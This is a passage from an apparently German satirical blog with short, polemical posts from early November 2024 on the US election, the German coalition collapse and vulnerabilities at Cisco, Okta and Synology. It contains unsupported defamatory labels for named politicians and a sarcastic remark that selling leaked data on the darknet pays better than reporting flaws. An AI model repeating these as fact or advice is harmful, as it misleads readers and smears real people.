Keine Sorge! Wir haben das Lösegeld nicht mit Kundeneinlagen bezahlt!1!!

Thu Nov 7 2024

[l] Wenn hier das nächste Mal Wahlkampf nur aus "die AfD ist schlimm" besteht, solltet ihr euch euch daran erinnern, wie gut das für Kamala Harris lief, einen Wahlkampf nur mit "der Trump ist schlimm" zu machen.
[l] Stell dir vor, du bist Microsoft, und keiner kauft dir deinen "KI"-Scheiß ab. Was tun?
Na was hat Microsoft denn in der Vergangenheit getan in solchen Fällen? Richtig! Sie haben ihre marktbeherrschende Position ausgenutzt und das mit irgendwas anderem in ein Paket gepackt und dann den Einzelkauf des anderen ohne das Paket nicht mehr angeboten!
So auch jetzt. Wenn keiner "Copilot Pro" kaufen will, dann packen wir das halt in das MS 362-Abo rein und machen das entsprechend teurer!1!!
Leider kann die EU da nichts machen, weil sie sich selber völlig unnötig komplett abhängig gemacht haben von Microsofts Produkten. Kein Produkt so schlecht, dass es nicht mit Steuergeldern gekauft würde.
[l] PSA: Achtet mal auf Burying.
Jetzt ist der perfekte Moment, um unbeobachtet einen Wirecard-belasteten Goldman-Sachs-Fuzzy zum Finanzminister zu machen.
Wer weiß, was die gerade noch so unter dem Radar durchzufliegen versuchen.
[l] Einem "Bioforschungslabor" sind 40 Affen entlaufen. Sie wollen nicht sagen, welchen Stoffen die ausgesetzt waren, aber raten eindringlich, Türen und Fenster geschlossen zu halten. Und man soll sie nicht berühren.
Ich weiß ja nicht, wie ihr das seht, aber ich habe 28 Days Later gesehen. Ich weiß, wie das weitergeht.
Wobei ...
The company works with monkeys to carry out clinical trials, including on brain disease disorder treatments, and says it has "one of the largest and most comprehensive nonhuman primate facilities, designed specifically for monkeys, in the United States."
Vielleicht doch eher Braindead als 28 Days Later.
Update: Oder es könnte auch 12 Monkeys werden?
[l] Stell dir vor, du spielst ein Sicherheitsupdate für Windows Server 2022 ein, und der patcht sich dann ungefragt zu Windows Server 2025 hoch.
It took Heimdal a while to trace the problem. According to a post on Reddit: "Due to the limited initial footprint, identifying the root cause took some time. By 18:05 UTC, we traced the issue to the Windows Update API, where Microsoft had mistakenly labeled the Windows Server 2025 upgrade as KB5044284."
Ist schon toll, wie Microsoft mit Convenience-Funktionen den armen überarbeiteten Admins die Arbeit leichter macht. Und auch betriebswirtschaftlich ist das geschickt. Wieso warten, bis die Leute freiwillig die neue Version kaufen?
Wie, ihr dachtet doch nicht, dass da keine Lizenzzahlungen fällig werden, oder?
Wo andere Leute für Terrorismus bestraft würden, werden Microsoft-Kunden halt ihre Backup-Strategie live testen und dann völlig unbeirrt weiter Geld nach Redmond werfen. Wenn sie nicht eh schon in die Cloud gezogen sind, weil da ist sowas ja dann jemand anders Problem!1!!
Update: Auf der anderen Seite ist Microsoft hier geradezu eine humanitäre Organisation. Sie haben die Schmerzen in der Welt gesehen und sich gedacht: Die Leute brauchen dringend eine Ablenkung. (Danke, Henning)
[l] Wieso eigentlich Neuwahlen erst im März, fragt sich vielleicht der eine oder andere von euch.
Ein Leserbrief dazu:
Ich wollt mal wissen, ob Scholz mehr Geld bekommt, wenn er bis nächstes Jahr wartet.
IANAL, aber scheinbar ja.
Pension für Kanzler und Minister nennt sich Ruhegehalt, geregelt in §15 Bundesministergesetz.
"Das Ruhegehalt beträgt nach Vollendung einer Amtszeit von vier Jahren 27,74 vom Hundert des Amtsgehalts und des Ortszuschlags. Es steigt mit jedem weiteren Amtsjahr um 2,39167 vom Hundert bis zum Höchstsatz von 71,75 vom Hundert."
Scholz ist laut Wikipedia seit dem 14.03.2018 Teil der Regierung. Wie ich es verstehe ist es dem Gesetz egal in welcher Rolle.
Damit bekäme er bei Amtsverlust nach dem 14.03.2025 2,4% mehr Geld. Entsprechend wäre ich sehr verwundert, wenn er vorher das Amt ablegt.
Update: Ein anderer Leser widerspricht.
dein Leserbrief ist in der Hinsicht leider gleich doppelt falsch:
1.) Wären es 2,4 Prozentpunkte mehr Gehalt nicht 2,4% mehr Gehalt. Wenn der Ausgangspunkt 27,74 Prozentpunkte sind, sind 2,4 Prozentpunkte 8,7% mehr Gehalt. Oder entsprechend noch mehr wenn man für 3,x Jahre von weniger als 27,74 Prozentpunkte ausgeht.
2.) Klickt man auf den mitgelieferten Link steht da:
"Bei einer Beendigung des Amtsverhältnisses aus den in § 9 Abs. 1 Nr. 1 und 3 genannten Gründen oder im Falle einer Auflösung des Bundestages und einer ununterbrochenen Zugehörigkeit zur Bundesregierung von mehr als zwei Jahren gilt dies als Amtszeit von vier Jahren."
§ 9 Abs 1 sagt:
"(1) Das Amtsverhältnis der Mitglieder der Bundesregierung endet
1. mit der Entlassung des Bundeskanzlers, wenn der Bundestag ihm nach Artikel 67 des Grundgesetzes das Mißtrauen ausgesprochen hat,
2. mit dem Zusammentritt eines neuen Bundestages,
3. mit jeder anderen Erledigung des Amtes des Bundeskanzlers."
tl;dr Scholz krieg so oder so seine 4 Jahre Gehalt.
Update: Es gibt noch die Theorie, dass im März in Hamburg die Bürgerschaftswahlen anstehen, und sich die SPD einen Push erhofft, wenn es da gut für sie läuft.
[l] Jonathan Pie zur Trump-Wahl.
[l] Ist schon ein bemerkenswerter Leidensweg, den unser Land da durchläuft.
Vom Cum-Ex-Kanzler mit Porschepleitier-Minister über Cum-Ex-Kanzler mit Goldman-Sachs-Minister zum Blackrock-Kanzler. Mal sehen, wie der den Goldman-Sachs-Minister noch toppen wird.
Hey, sie könnten noch Tönnies in die Lebensmittelregulierung holen!
[l] Ich versuche mir gerade ein bisschen Trost einzureden mit der Idee, dass selbst unser verkackter Realitätsabzweig ein Limit des Leidens hat. Trump, Ukraine, Palästina, Klimawandel UND Lindner als Finanzminister hat das Limit gesprengt.
[l] Nach all dem Staatsversagen kommen wir jetzt zum Marktversagen.
Cisco hat mal wieder eine Bugdoor in einem ihrer versifften Management-Interfaces.
A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system.
Jawohl, meine Damen und Herren. Ein Webserver, der als root läuft, und vor der Authentisierung keine Eingabevalidierung macht.
Im Jahre 2024.
Das schafft nur ein wirklich marktführender Konzern, der jahrzehntelang gezielt nicht in kompetentes Personal investiert. Oder ein Konzern, der von der NSA eingeflüstert kriegt, wo er die Backdoors platzieren soll.
Das kann nur ein Konzern machen, dessen Schrott-Produkte trotzdem immer wieder Idioten kaufen. In einem funktionierenden Markt wäre der Laden eine Ruine, von Heuschrecken gekauft, ausgeblutet und vor die Wand gefahren. (Danke, Micha)
[l] Wo wir gerade bei Korruption und Staatsversagen waren: Wissing tritt aus der FDP aus, um Minister bleiben zu können. Er war noch nicht fertig mit der flächendeckenden Infrastrukturzerstörung.
Update: Der Postillon hat die Erklärung:
"Ist langjährige Tradition des Amtes": Verkehrsminister Wissing erklärt, warum er nicht zurücktritt
[l] Falls ihr mal kurz eure Vorurteile über Olaf "Cum Ex" Scholz und unseren neuen Finanzminister bestätigt haben wollt: Lobbypedia liefert.
Jörg Kukies (*21.02.1968 in in Mainz) (SPD), war jahrelang in führenden Positionen der globalen Investmentbank Goldman Sachs, zuletzt als Deutschlandchef, tätig.
Da kannst du eigentlich schon aufhören. Aber lest weiter!
2018 wechselte er unter Finanzminister Olaf Scholz (SPD) an die Spitze des Bundesfinanzministeriums. Dort war er zuständig für den Bereich der Banken- und Finanzmarktregulierung, auch die seines bisherigen Arbeitgebers.
Jawohl, meine Damen und Herren. Das nennt man Regulatory Capture und es ist eine der wichtigsten Formen von Korruption und Staatsversagen.
Update: Wikipedia hat auch noch ein paar "Qualifikationen".
Laut einem Spiegel-Bericht drängte er zwei Tage vor der Wirecard-Insolvenz in einem Telefonat den KfW IPEX-Bank-Chef Klaus R. Michalak, Wirecard einen neuen Kredit zu gewähren.
Passt wie Arsch auf Eimer!

Wed Nov 6 2024

[l] Scholz entlässt Lindner.
Äh, und nun? Jetzt wird Merz Kanzler oder wie? Weil das glaubt der ja wohl selber nicht, dass er bei Neuwahlen eine Chance hat.
Boah als wenn heute noch nicht genug kaputtgegangen wäre!
Update: Whoa, wir haben ja einen ... Kanzler! Und er hat eine Rede gehalten! Die Rede seines Lebens, würde ich sagen.
Ich fragte mich gar: Wer ist dieser Typ da im Fernsehen und was haben sie mit dem Scholz gemacht?!
[l] Können wir vielleicht JETZT darüber reden, ob Identity Politics, Gendersternchen und Opferolympiade rückblickend klug waren?
Oder müssen erst noch ein paar Länder an die Faschisten fallen?
[l] Der sächsische AfD-Landesverband hat drei Mitglieder ausgeschlossen, die den "Sächsischen Separatisten" zugeordnet werden.
Drei? Gestern waren es noch zwei!
[l] Genau mein Humor:
Die Schlachterei Tönnies steht im Verdacht, ohne Kennzeichnung Brei aus Schlachtabfällen in seine Wurst zu mischen. Jetzt soll die gleichnamige Unternehmensgruppe einen neuen Namen bekommen.
Welchen Namen? Premium Food Group!
*wieher*
[l] Mozilla Foundation lays off 30% staff, drops advocacy division
Das ist die Foundation. Firefox wird von der Mozilla Corporation gemacht.
[l] Versuchen wir es positiv zu sehen.
Endlich tut mal jemand was gegen die amerikanische Hegemonie!
Jetzt wird hoffentlich auch der letzte Kloppi verstehen, wieso man seine Daten nicht in einer amerikanischen Cloud ablegt!
[l] Ein anderer beunruhigender Gedanke ist, dass jetzt Länder wie Taiwan und Japan dringend schnell Atombomben haben wollen werden, der Iran ja sowieso. Russland und USA haben das bisher zu verhindern versucht, aber die haben jetzt beide die Hände mit anderen Dingen voll.
Die Frage ist, ob die Ukraine die Ressourcen für ein Atomprogramm hat. Vielleicht haben die noch ein paar strategische Akten aus der Sowjetzeit aufgehoben?
Aber Polen z.B. wäre auch zuzutrauen, dass sie eine Versicherung gegen einen Einmarsch der Russen haben wollen, und nicht der Nato beim Zerbröseln zugucken wollen.
[l] BMW bricht der Gewinn um 84% ein und sie faseln was von E-Fuels. Die haben echt alle den Schuss nicht gehört.
[l] Wer freut sich nicht über Post vom Finanzamt? Dieser Typ hier, der einen Elster-Zugang beantragt hat, und dann 1700 Mal denselben Brief vom Finanzamt bekam.
Fehlerdiagnose:
„Der Antrag beziehungsweise der daraus resultierende Zugangsbrief ist durch einen technischen Fehler, ausgelöst durch die zeitgleiche Zeitumstellung quasi in eine „Zeitschleife“ geraten.“
Klar, hört man ja immer wieder. Wer von uns ist noch nicht in eine Zeitschleife geraten bei der Zeitumstellung?!
Softwarefehler. Kann man nichts machen.
[l] Wie angesagt macht es mir nicht die geringste Freude, dass Trump kurz vor dem Wahlsieg steht.
Auch fehlt mir gerade der jugendliche Optimismus von 2016, dass es vielleicht doch nicht so schlimm wird.
Es gibt da eine Menge wirklich unangenehmer Gedanken gerade. Vance ist ein Triebtäter, wie es damals Pence war.
Aber wie ist es mit der Aussicht für Europa? Die Ukraine ist dann ja wohl Toast, wenn ihr größter Beschützer wegfällt. Aber ich stelle mir gerade vor, wie Putin sich die Hände reibt, und sagt: Der Job in Amerika ist fertig. Da müssen wir nicht mehr destabilisieren. Jetzt kann unsere Destabilisierungsmaschine sich ganz Europa widmen!
Amerika ist natürlich auch Toast. Mit Impfgegner RFK als Gesundheitsminister und Elon "Vorschlaghammer" Musk als "Entbürokratisierer" ist schon abzusehen, wie das weitergehen wird.
Diese Wahl hat noch eine Sache ein für alle Mal klar gemacht: Die Wähler wollten Trump. Die haben Trump nicht trotz seiner Schwächen gewählt sondern wegen seiner Schwächen. Auch Argumente wie Abtreibung und Marijuana sind nicht einfach per se mehrheitsfähig. Die Leute wollten das und wir sollten daher auch kein Mitleid mit denen haben. Ist wie bei Brexit damals.
Update: Für die Palästinenser ist das natürlich auch eher apokalyptisch. Trump hatte Netanjahu gesagt, er solle halt tun, was er tun muss. Carte Blanche für den Gazastreifen. Vermutlich wird das die Palis in Europa befeuern, noch mehr Infrastruktur kaputtzumachen, und auch ihre letzten Freunde zu verlieren. Die Politik der Harris war auch schon katastrophal für die Palis.
Hoffentlich wird Berlin jetzt nicht von einer Kulturkampf-Einhörner-Flüchtlingswelle aus Kalifornien überrannt. Ich hörte, dass die schlaueren Einhörner alle nach Neuseeland flüchten, und hier in Berlin eher die nicht so schlauen rauskommen werden.
Update: Wenn ihr es noch nicht getan habt, solltet ihr jetzt noch schnell den Greg-Palast-Film über Georgia gucken. In der besten Demokratie, die man für Geld kaufen kann, haben sich die Milliardäre das Ergebnis gekauft, das sie haben wollten.

Tue Nov 5 2024

[l] Die Netflix-Büros in Frankreich und den Niederlanden hatten eine Hausdurchsuchung seitens der Finanzbehörden. Grund:
French outlet La Lettre A had reported that Netflix's French operation was structured until 2021 so that all subscribers signed up with a Dutch subsidiary -- thereby "minimising its tax bill".
That left it paying less than one million euros ($1.1 million at today's rates) in taxes to Paris across 2019 and 2020, when it had around seven million French subscribers.
Na kein Wunder, dass die Franzosen mit der Gesamtsituation unzufrieden sind.
[l] Hier ist einer für Arcade-Videospiele-Enthusiasten. Ein Retro-Hacker macht ein Video über die Bewegung von zwei Geistern bei Ms Pacman. Pacman kann ja so ein Powerup fressen und dann kehrt sich kurzzeitig die Dynamik um. Normalerweise rennen vier Geister hinter Pacman her und können ihn bei Kontakt töten. Mit dem Powerup kann Pacman sie bei Kontakt töten und daher fliehen sie.
Im Original-Pacman-Spiel flieht jeder Geist in eine der vier Ecken der Karte. Ms Pacman haben sie aus Kostengründen nicht komplett neu entwickelt sondern das ist dasselbe Mainboard sogar mit denselben ROMs aber sie patchen dann ein paar Bytes in den ROMs, und diese Patches haben sie verkackt.
Das Highlight von dem Video ist aber nicht das Video selbst sondern der oberste Kommentar. Da ist einer der Entwickler gekommen und bestätigt die Darstellung in dem Video und schreibt dann:
Ok that is seriously depressing. A bug report for work we did in November 1981, 43 years ago.
Hier ist die Bio von dem Typ. (Danke, Kurt)
[l] Remember Remember the 5th of November!
People shouldn't be afraid of their governments. Governments should be afraid of their people.
[l] Nene, pass uff, Atze, die AfD? Das sind gar keine Nazis. Das sind überzeugte Demokraten! Mit beiden Beinen fest auf dem Boden der Verfassung stehend und so!
Gut, bis auf den einen oder anderen bedauerlichen Einzelfall.
Sie nannten sich "Sächsische Separatisten" und hegten Umsturzpläne: Am Dienstag haben Ermittler eine rechtsextremistische Gruppierung zerschlagen und acht junge Männer festnehmen lassen. [...]
Wie der Generalbundesanwalt mitteilte, werden die Beschuldigten dringend verdächtigt, einer inländischen terroristischen Vereinigung anzugehören. [...]
Nach Information des MDR ist unter den Festgenommenen auch der AfD-Stadtrat Kurt Hättasch aus Grimma.
Es sind immer die, von denen man es am wenigsten vermutet hätte!1!!
Hey Fefe, wieso sagst du Einzelfälle? Das war doch nur einer? Weil die Meldung noch weitergeht.
Der ebenfalls festgenommene Kevin R. engagiert sich ebenso für die AfD in der Kommunalpolitik, vertritt Hättasch etwa bei Sitzungen des Beirates für Kultur, Jugend und Sport des Stadtradts in Grimma.
Nicht doch die AfD! Das waren doch immer lupenreine Demokraten!1!!
[l] Liebe Kinder, gebt fein acht: Wenn Israel den Iran angreift, ist das ein "Vergeltungsschlag". Wenn der Iran Israel angreift, ist das ein "Angriff".
Ein Glück, dass unsere Nachrichten nicht so manipulativ sind wie anderswo, nicht wahr?
[l] Wo wir gerade bei harmlosen Schwarzpulverenthusiasten waren: Hier ist ein harmloser Artillerieenthusiast!
Die Bundespolizei hat bei Grenzkontrollen in Aachen einen ungewöhnlichen Fund gemacht: Ein 60-Jähriger transportierte auf einem Anhänger eine Artillerie-Kanone.
Der Nanny State belästigt schon wieder harmlose Sportschützen!1!! (Danke, Holger)
[l] Heute wird alles mit der US-Wahl überladen sein. Wenn ihr statt "too close to call"-Hysterie lieber ein bisschen Inhalt sehen wollt, dann könnt ihr euch mal Greg Palasts neuen Film "Vigilante Inc" angucken.
Es geht da um Wahlmanipulation in Georgia aber auch um die Kontinuität mit Ku-Klux-Klan-Ära Vorgehensweisen.
[l] Ein Leser weist auf diesen schwer bewaffneten Rentner hin und freut sich, dass das kein Terrorist war sondern bloß ein Schwarzpulverenthusiast.
[l] Ach was kann da schon passieren, wenn Schweden in die Nato geht? Das ist doch ein halbwegs zivilisiertes Land mit schlauen Leuten!
Nun, Schweden hat gerade Pläne für 13 Windparks in der Ostsee gestoppt.
Begründung:
Decision comes after military concludes projects would complicate defending Nato’s newest member against attack
Fucking Hell.
[l] Endlich muss man sich schlechte Amazon-Serien nicht mehr angucken, sondern kann sich die "KI"-Zusammenfassung durchlesen. Gedacht ist das für Leute, die nach längerer Zeit weitergucken wollen.
Kann aber eigentlich nur nach hinten losgehen, denn die meisten Serien schinden ja am Anfang schon minutenlang Zeit mit überflüssigen Rückblicken. Außerdem werden Streaming-Serien ja über die Anzahl der geguckten Minuten verkauft. Wenn ich einfach vorskippen und den Recap gucken kann, geht das ja runter.
Da hat glaube ich die eine Hand nicht mit der anderen Hand geredet bei Amazon.

Mon Nov 4 2024

[l] Gute Nachrichten! Endlich boomt der Regional- und Nahverkehr! Busse und Züge sind so voll wie nie zuvor!
Völlig klar also: Da werden wir jetzt investieren! Das Angebot ausweiten!
Ein paar Jahre weiter so und wir erreichen am Ende noch unsere CO2-Ziele im Verkehr!!1!
Zu früh gefreut!
Höhere Kosten für Personal und Fahrzeuge belasten die Nahverkehrsbranche. Nun überlegen mehrere Länder, ob sie deshalb künftig weniger Züge fahren lassen, obwohl die Nachfrage steigt.
Das ist so absurd, dass es sogar der CDU (!!!) auffällt.
»Die Abbestellungen – auch wenn es nur Randzeiten und weniger als 1,5 Prozent aller Verbindungen im Land betrifft – bleiben schmerzhaft und sind sicher nicht das Signal, das wir senden wollen«, teilte Landesverkehrsminister Claus Ruhe Madsen (CDU) im August mit.
Das muss eine Krise erst mal schaffen, nicht von der CDU, die es verkackt hat, geleugnet zu werden.
Mehr Nachfrage also wird das Angebot ausgedünnt, hmm? Das muss diese unsichtbare Hand des Marktes sein, von der man immer so viel hört!1!! (Danke, Peter)
[l] Leserbrief zu den Security-Nichtschwimmern:
Da fällt mir dieser Thread ein…
Was mir dabei besonders gefällt: „Ausgeleierte“ Schlüssel passen praktisch überall. Offensichtlich haben die Autobauer daran gedacht, dass die Leute ja 20 Jahre lang mit ihrem Schlüssel in ihr Auto reinwollen, und dafür gesorgt, dass aus den Schlüsseln durch Verschleiß am Ende ein Dietrich wird, weil der Failure-Mode, den der Hersteller vermeiden will, nicht etwa Diebstahl ist (da verkauft man ein neues Fahrzeug!), sondern das Austauschen des Schließzylinders.
Das ist nur ein Thread über ganz stinknormale mechanische Schlüssel, mit den elektronischen will ich gar nicht anfangen. Oder doch? Weil's Spaß macht, und VW hat bei der ersten Entdeckung dieser Gruppe auch völlig „richtig“ reagiert: Sie haben erst mal die Finder der Schwachstelle verklagt, und dadurch die Veröffentlichung um 2 Jahre verzögert. Man sieht daran, dass Richter in solchen Fällen auf der Seite der Autohersteller stehen, und nicht etwa sich Sorgen um ihre Karre machen. Das hat die Sicherheitsexperten immerhin nicht davon abgehalten, praktisch das komplette digitale Schlüsselsystem vieler Hersteller (nicht nur VW) auszuhebeln.
Mit anderen Worten: An der Korruption von Politik und Justiz ist die Automobilindustrie schuld. Hey, macht deren Schuldmaß auch nicht mehr fett, nachdem sie an der Zerstörung der Biosphäre Schuld sind.
[l] Gute Nachrichten! Die Telekom kümmert sich um den Klimawandel. Ist so gut wie gelöst, das Problem. Wir müssen nur erst ein paar Bitcoins minen, klar. Für, äh, die Stabilisierung des Stromnetzes. (Danke, Johannes)
[l] Nachdem ich mich hier über das "taktische Passiv" in Krisen-PR aufgeregt habe, weist ein Leser auf dieses Beispiel hin, wie man das richtig macht. Ja, DER Jeremy Clarkson. Von Top Gear und dann Clarkson's Farm (Guckempfehlung übrigens).
Kein Passiv. Kein "Dinge passieren halt". Einfach ein "wir haben es verkackt und ihr solltet jetzt schnell folgende Dinge tun, um euch zu schützen".
Wo würdet ihr das nächste wieder kaufen? Bei Leuten mit taktischem Passiv oder bei so jemandem?
Update: Jaja, technisch gesehen ist "There has been a massive cock up" auch ein Passiv. Klugscheißer, elende.
[l] Nicht nur in Hannover gibt es Security-Nichtschwimmer der Denkschule "ich kann es nicht also ist es unmöglich". Auch das LG Aachen hat sich solche Leute eingetreten (geht um den Fall Modern Solutions). Die hatten mehrere Mandanten in derselben Datenbank, die mit nacktem Arsch im Internet ging, und die Zugangsdaten waren in einem ausgelieferten Binary drin.
Hier die Aussagen der Staatsanwaltschaft, von einem Verfahrensbeobachter berichtet.
Es geht nur um dem SQL Zugriff, nicht um die angebliche Decompilierung. Ihm geht es um die Screenshots.
Zur Nutzung der credentials sagt er "es ist Lebensfremd das man so auf ein Datenbank zugreift"
Ooooh, das ist also lebensfremd, dass man auf eine Datenbank zugreift!1!!
Da fragt man sich ja schon, was die Staatsanwaltschaft den ganzen Tag macht. Faxe schicken nehme ich an.
Wenn ihr also in Deutschland auf derartig stümperhaft kaputtkonfigurierte Bauruinen von Softwaresystemen stoßt, dann versucht nicht denen zu helfen. Die Anreize, die Politik, Gerichte und Staatsanwaltschaften setzen, sind mehr als eindeutig. Es ist weniger riskant und profitabler, die Daten direkt im Darknet zu verkloppen. Der Standort Deutschland ist eh nicht mehr zu retten.
Was der Richter wohl sagen würde, wenn er merkt, dass sein Autoschlüssel auch in alle anderen Autos derselben Baureihe passt? Fände er dann auch, dass die Autohersteller schon alles in ihrer Macht liegende gemacht haben?
Unglaublich.
Im Kern geht es der Kammer darum ob ein Jedermann auf die Daten (SQL Datenbank) zugreifen kann. Das verneint in diesem Fall die Kammer.
Auf dem Screenshot der .exe Datei (in notepad) können sie als Laien nix entnehmen, sie haben es versucht und nix verstanden.
Es ist offensichtlich das Modern Solutions versucht hat (sic!) die Daten zu schützen. Die Schutzmaßnahmen waren für Experten wohl ein Witz, aber das ist irrelevant. Es gab den willen und einen Versuch, das ist durch das Kennwort evident.
Herzlichen Glückwunsch. Jedes Land hat die Regierung und die Richter, die es verdient hat.
[l] Okta legt auf den letzten Metern des Jahres nochmal nach. Da wird sich Cisco aber warm anziehen müssen!1!!
The Okta Device Access features, provided by the Okta Verify agent for Windows, provides access to the OktaDeviceAccessPipe, which enables attackers in a compromised device to retrieve passwords associated with Desktop MFA passwordless logins.
Ich bin ja immer wieder fasziniert, mit wie vielen völlig unvertrauenswürdigen "Agenten" sich typische Enterprise-Installationen die Geräte vollmüllen. Jeder davon ist zusätzliche Angriffsoberfläche!

Sun Nov 3 2024

[l] Journalismus am Anschlag vom Hannoveraner Pressemitteilungsabdruckservice. Diesmal keine Pressemitteilung sondern ein Kommentar in eigener Sache. Ich zitiere:
Kommentar: Es ist keine Schande, gehackt zu werden
Ich beneide so Leute ja immer um ihr Selbstbewusstsein. Wenn ich etwas probiere und nicht schaffe, dann nehme ich an, ich mache etwas falsch und muss meine Herangehensweise ändern.
Nicht so die Denkschule, die wir hier beobachten können! Da sieht man Scheitern eher als Zeichen, dass das dann halt unmöglich ist und niemand das kann. Denn wenn das ginge, dann hätte ich es ja geschafft. Und zwar beim ersten Versuch!
So, und weil ihr alle per Definition dümmer als ich seid, solltet ihr euch nicht grämen, wenn ihr es auch nicht schafft!
Richtig deprimierend wird es, wenn ihr darüber nachdenkt, was für weitere Implikationen diese Einstellung hat. Wenn aus "ich kann es im Moment nicht" direkt "es geht nicht" folgt, dann ist auch Fortbildung Zeitverschwendung. Dinge dazu lernen? Überflüssig! Besser als was ich jetzt mache geht eh nicht!
Und ehe du es dich versiehst ist die Selbstzerstörung selbstverstärkend.
[l] Wo wir gerade bei Katastrophen waren: Berlin-Lichtenberg hat eine Katastrophenübung gemacht. Die wollten mal gucken, wie die Rettungsorganisationen mit einem Berg von Leichen und Verwundeten umgehen würden im Notfall. Weil es ja möglichst nah am Ernstfall sein sollte, haben sie vorher nicht Bescheid gesagt.
Ergebnis: Die Hilfskräfte erschienen nicht zur Übung.
Laut der Deutschen Presse-Agentur (DPA) habe es Schwierigkeiten gegeben, freiwillig organisierte Dienste ausreichend zu mobilisieren, sagten Behördenvertreter, die den vorher geheim gehaltenen Ablauf beobachteten.
Der Himmel stehe uns bei, falls wir mal wirklich ein Problem haben.
Nach Beobachtungen von rbb-Reportern lagen die angeforderten 75 Statisten bereits als vermeintliche Opfer auf dem Boden. Wer aber nicht zur Übung kam, waren die Rettungskräfte der Hilfsorganisationen - also wurde die Übung nach mehreren Stunden abgebrochen. Die Komparsen wurden kurz nach 13 Uhr nach Hause geschickt.
Die armen Komparsen. Liegen da rum und spielen Leiche und keiner kommt. m(
Berlin bleibt stabil! Ein Wunder, dass so wenig passiert.
[l] Wo wir gerade bei Bahnausfällen sind: Siemens hat ein desaströses Softwareupdate ausgerollt und jetzt funktioniert nur die vordere Zughälfte.
Siemens Mobility, das den Triebwagen namens „Desiro“ vor sechs Jahren in Betrieb genommen hat, hält sich ebenfalls zurück: „Die Züge der RRX-Flotte sind momentan mit Einschränkungen im Betrieb, da bei einigen Zügen im Kommunikationssystem zwischen Fahrgästen und Zugführung ein Fehler aufgetreten ist. Wir arbeiten intensiv daran, diesen zu beheben und entschuldigen uns für die entstandenen Unannehmlichkeiten.“
Ah, der taktische Passiv in Presseverlautbarungen. Da ist ein Fehler aufgetreten. Nicht: Siemens hat in einem geradezu epischen Monsterverkacker ein kaputtes Update ungetestet bei seinen Kunden aufgespielt und die haben jetzt Ausfälle und Verkehrschaos. Nein. Ein Fehler ist aufgetreten. Kann man nichts machen.
Ärgert mich ja maßlos, sowas. (Danke, Thilo-Alexander)
[l] In Berlin Ahrensfelde hat ein Regionalzug Feuer gefangen und brannte komplett aus.
Das war ein ziemlich neuer Zug der NEB, der Niederbarnimer Eisenbahngesellschaft.
Tja, und jetzt? Serienfehler oder Brandstiftung?
Ich kann mir nicht vorstellen, dass jemand Hass gegen die NEB hat. Die betreiben die sehr populäre Heidekrautbahn und deren Personal ist mir noch nie anders als freundlich, zuvorkommend und professionell aufgefallen. Die Züge sind auch modern und sauber.
Die Züge sind AFAIK von Siemens. Na mal gucken, wie es weitergeht.
Update: Leute, die sich besser mit sowas auskennen, sagen, dass es sich um einen Zug von Bombardier handelt. Ich kam auf Siemens, weil die auf ihrer Webseite Werbung für einen Siemens-Wasserstoff-Probezug hatten.
Update: Das war nicht der ersten Brand in diesem Zugtyp, nicht mal bei der NEB.
Update: Der Zug war 20 Jahre alt. Mehrere Leser finden, das falle nicht unter "ziemlich neu". Ist vermutlich eine Frage der Perspektive. Ich dachte der Zug ist neuer.
[l] Lindner hat seinen Wirtschaftsplan vorgelegt und er löst Begeisterung aus.
Bei der CDU.
Vorschläge in dem jüngsten Grundsatzpapier von FDP-Chef Christian Lindner seien zum Teil wörtlich aus Anträgen übernommen, die die Unionsfraktion in den vergangenen zwei Jahren in den Bundestag eingebracht habe, schreibt der CDU-Kanzlerkandidat in seinem E-Mail-Newsletter "MerzMail".
Ah, der Lindner. Der beste Mann! ... der CDU.
Das Problem für die FDP ist halt, dass die CDU ja nicht blöde ist. Wenn der Lindner in der Ampel seine Koalition dermaßen krass verrät und in den Rücken dolcht, dann muss man davon ausgehen, dass er dasselbe mit der CDU auch machen wird.
Wie heißt es so schön? Alle lieben den Verrat, niemand liebt den Verräter.
[l] Hier ist einer für die Netzwerker unter euch.
Es scheint, als würde O2 seinen Präfix nicht von einer FE80::/8 Adresse verschicken, sondern von einer Adresse, die den Anschein macht als würde sie gerne eine FE80::/8 Adresse sein:
Adresse von der ich die DHCPv6 Antwort bekomme: 0:80fe::f6e4:51ff:fed3:bc71
Adresse von der ich die DHCPv6 Antwort erwartete: fe80::f6e4:51ff:fed3:bc71
Einmal mit Profis arbeiten! (Danke, Maximilian)

Sat Nov 2 2024

[l] Filmtipp: Laboratory Conditions, ein Horror-Kurzfilm auf Youtube. 17 Minuten. Habe ich selber leider erst nach Halloween entdeckt.
[l] In Dublin haben Tausende an einer Halloween-Parade teilgenommen.
Einziges Problem: Es gab keine Parade. Die hat sich eine "KI" aus dem Arsch gezogen.
The parade was announced by My Spirit Halloween and attracted thousands of Dublin locals to gather along a route from Parnell Square to Temple Bar for an event supposedly organised by Galway arts ensemble Macnas. It was only after the Halloween fans arrived that it became clear that the website had made the entire parade up.
Schon tolle Technologie, dieses "KI". Da willst du doch deine berufliche Zukunft drauf wetten!1!!
[l] Benutzt hier jemand Synology-Produkte?
Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack
[l] Intel ist aus dem Dow Jones geflogen, den Platz kriegt jetzt Nvidia.
Weia.
[l] Wieso ist eigentlich kein Geld mehr für Open-Source-Förderung da?
Weil sie das Geld schon für Blockchain-Förderung aus dem Fenster geworfen haben. Und jetzt neu: "KI". Klar.
Kein Trend ist zu blöde, als dass er nicht mit Steuergeld beworfen wird.
[l] Wenn sich Cisco, Fortinet, Crowdstrike und Ivanti ein Rennen liefern, da kann Okta nicht einfach tatenlos herumstehen!1!!
Alleine für den Hostnamen "trust.okta.com" für ihre Security Advisories müsste eigentlich ein Regulator diese Firma zerschlagen. Aber ignoriert das mal kurz. Lest mal das Advisory. Das ist so bizarr, dass mir gerade echt die Worte fehlen. Ich zitiere mal:
Okta AD/LDAP Delegated Authentication - Username Above 52 Characters Security Advisory
Nein, wirklich!
On October 30, 2024, a vulnerability was internally identified in generating the cache key for AD/LDAP DelAuth. The Bcrypt algorithm was used to generate the cache key where we hash a combined string of userId + username + password. During specific conditions, this could allow users to authenticate by only providing the username with the stored cache key of a previous successful authentication.
Note: A precondition for this vulnerability is that the username must be or exceed 52 characters any time a cache key is generated for the user.
